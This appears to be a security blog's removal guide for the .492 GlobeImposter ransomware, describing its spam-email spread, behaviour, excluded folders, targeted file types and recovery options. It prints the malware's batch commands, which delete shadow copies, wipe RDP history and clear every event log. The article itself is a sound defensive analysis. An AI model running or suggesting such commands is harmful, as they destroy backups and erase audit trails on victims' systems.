.492 File Virus - Remove and Restore Your Files (GlobeImposter)

.492 File Virus – Remove and Restore Your Files (GlobeImposter)

Article created to show how to remove the .492 GlobeImposter ransomware virus and then aid with the file recovery process of .492 encrypted files.

Yet another version of the notorious GlobeImposter ransomware has come out in the wild. Similar to the prevous ..726 and .725 file extensions, this infection also uses a 3 digit number for the files it encrypts. The .492 file virus’s main purpose is to encrypt the files on the compromised computer after which extort the victims into paying a hefty ransom fee to get the files back. If you are one of the victims of this ransomware virus, we recommend that you read this article completely and learn how to remove this virus and how to try and get your data back without having to pay a ransom.

Threat Summary

Name.492 File Virus
TypeRansomware, Cryptovirus
Short DescriptionEncrypts the files on the infected computer, displaying a ransom note which aims to extort victims into paying a hefty ransom fee.
SymptomsThe virus encrypts the files, adding the .492 file extension, after which drops a ransom note file, named here_your_files!.html
Distribution MethodSpam Emails, Email Attachments, Executable files
Detection Tool See If Your System Has Been Affected by .492 File Virus


Malware Removal Tool

User ExperienceJoin Our Forum to Discuss .492 File Virus.
Data Recovery ToolWindows Data Recovery by Stellar Phoenix Notice! This product scans your drive sectors to recover lost files and it may not recover 100% of the encrypted files, but only few of them, depending on the situation and whether or not you have reformatted your drive.

How Does .492 File Virus Infect

The infection process of the .492 ransomware is conducted via e-mail. More specifically, the cyber-criminals who are behind this virus aim to send massive waves of spam e-mails to a pre-configured list of victims to spam. The e-mails pretend to be legitimate payment receipts, however instead of such receipts, the victim opens the infection file of .492 ransomware. Here is one reported case of spam e-mail spreading GlobeImposter ransomware:

Source: Malware-Traffic-Analysis.net

Other form of e-mail spam associated with the .492 globeimposter variants is spreading the malicious file with a blank slate e-mail spam. This means that the message being sent does not contain any topic or text, only the malicious e-mail attachment. The blank slate e-mail spam has been detected by malware researchers to spread the malicious file of .492 ransomware, that has the following details, as reported in VirusTotal:

.492 File Virus – Activity

The .492 ransomware is the type of malware you do not want to have infecting your computer system. After infection it attacks different aspects of Windows, all starting with opening it’s malicious processes that grant it control over your computer. After it has done this, it may use it’s administrative power to perform a series of malicious activities on your computer.

One such activity is to execute a batch file (.bat) that has the following commands within it:

→ @echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default” /va /f
reg delete “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers” /f
reg add “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers”
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F “tokens=*” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl

The functions of those commands are to heavily modify the Windows Registry Editor with it’s added registry entires in order to automatically execute malicous processes. Another activity from those commands is to delete the Shadow Volume Copies on your computer so that you are unable to restore your files via this method.

One malicious process is reported to have the function, called “CREATE_SUSPENDED”. This function creates suspended processes which are replaced with a malicious code that has previously been extracted.

When this code has previously been extracted, the malicious process’ function is to execute it without you noticing any of this activity. The malicious process may pretend to be a text file, but is actually an executable type of file, hence you may notice it by the double extension – .txt.exe.

The modification, performed by this malicious process, attacks a significant part of Windows, that changes it’s sleep settings. It attacks the Power Options, setting the Windows computer’s Sleep settings to “Never” while the .492 ransomware virus performs it’s malicious activity.

The .492 GlobeImposter virus has also been configured to prevent malware researchers to analyze it while it is running, by encrypting most strings and part of it’s APIs(Application Programming). After having “set up the ground” for the damage it’s about to do, the .492 ransomware variant begins to encrypt the files on the infected computer.

.492 Ransomware – Encryption Analysis

The encryption process of .492 file virus is a very clever one, as the ransomware encrypts only specific files in only specific folders. For starters, the .492 file extension ransomware uses a “White List” or an exclusion list of folders in which it skips encrypting data. These folders are important folders for the proper functioning of the Windows computer after it has encrypted the important files in it. The folders which it has excluded from encryption are the following:

Windows, Microsoft, Microsoft Help, Windows App Certification Kit, Windows Defender, ESET, COMODO, Windows NT, Windows Kits, Windows Mail, Windows Media Player, Windows Multimedia Platform, Windows Phone Kits, Windows Phone Silverlight Kits, Windows Photo Viewer, Windows Portable Devices, Windows Sidebar, WindowsPowerShell, Temp, NVIDIA Corporation, Microsoft.NET, Internet Explorer, Kaspersky Lab, McAfee, Avira, spytech software, sysconfig, Avast, Dr.Web, Symantec, Symantec_Client_Security, system volume information, AVG, Microsoft Shared, Common Files, Outlook Express, Movie Maker, Chrome, Mozilla Firefox, Opera, YandexBrowser, ntldr, Wsus, ProgramData.

While those folders are fortunatey excluded, the .492 ransomware does not have any mercy for files that are audio, video, database, image and other file types. The total file extensions it attacks are 170 and are as reported by Xiaopeng Zhang at Fortinet, the following:

→ .$er .4db .4dd .4d .4mp .abs .abx .accdb .accdc .accde .accdr .accdt .accdw .accft .adn .adp .aft .ahd .alf .ask .awdb .azz .bdb .bib .bnd .bok .btr .cdb .cdb .cdb .ckp .clkw .cma .crd .daconnections .dacpac .dad .dadiagrams .daf .daschema .db .db-shm .db-wa .db2 .db3 .dbc .dbf .dbf .dbk .dbs .dbt .dbv .dbx .dcb .dct .dcx .dd .df1 .dmo .dnc .dp1 .dqy .dsk .dsn .dta .dtsx .dx .eco .ecx .edb .emd .eq .fcd .fdb .fic .fid .fi .fm5 .fmp .fmp12 .fmps .fo .fp3 .fp4 .fp5 .fp7 .fpt .fzb .fzv .gdb .gwi .hdb .his .ib .idc .ihx .itdb .itw .jtx .kdb .lgc .maq .mdb .mdbhtm .mdf .mdn .mdt .mrg .mud .mwb .myd .ndf .ns2 .ns3 .ns4 .nsf .nv2 .nyf .oce .odb .oqy .ora .orx .owc .owg .oyx .p96 .p97 .pan .pdb .pdm .phm .pnz .pth .pwa .qpx .qry .qvd .rctd .rdb .rpd .rsd .sbf .sdb .sdf .spq .sqb .sq .sqlite .sqlite3 .sqlitedb .str .tcx .tdt .te .teacher .tmd .trm .udb .usr .v12 .vdb .vpd .wdb .wmdb .xdb .xld .xlgc .zdb .zdc

After the encryption process has completed, the ransomware virus does not forget to change the default file types to it’s own one, making the files to appear like the following:

The .492 ransomware also does not forget to drop it’s extortion ransom note, named here_your_files!.html:

How to Remove .492 Virus and Recover Files

Before beginning to remove this ransomware virus from your computer, we would suggest to focus on backing up your encrypted files beforehand.

After having backed up all your files, you can proceed with the removal process of .492 ransomware virus by following the removal instructions below. If manual instructions represent a difficulty, the best method to remove .492 ransomware fully, according to experts in the field, is to use a ransomware specific anti-malware software. Such will ensure for a full and safe removal and protect your computer in the future as well.

If you want to restore your files in the event that they have the .492 file extension, we recommend trying out our alternative methods and tools suggested in step “2. Restore files encrypted by .492 File Virus” below. They may not be with 100% success rate but will make sure that you restore as many files as possible.

Ventsislav Krastev

Ventsislav has been covering the latest malware, software and newest tech developments at SensorsTechForum for 3 years now. He started out as a network administrator. Having graduated Marketing as well, Ventsislav also has passion for discovery of new shifts and innovations in cybersecurity that become game changers. After studying Value Chain Management and then Network Administration, he found his passion within cybersecrurity and is a strong believer in basic education of every user towards online safety.

More Posts - Website

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Share on Twitter Tweet
Share on Google Plus Share
Share on Linkedin Share
Share on Digg Share
Share on Reddit Share
Share on Stumbleupon Share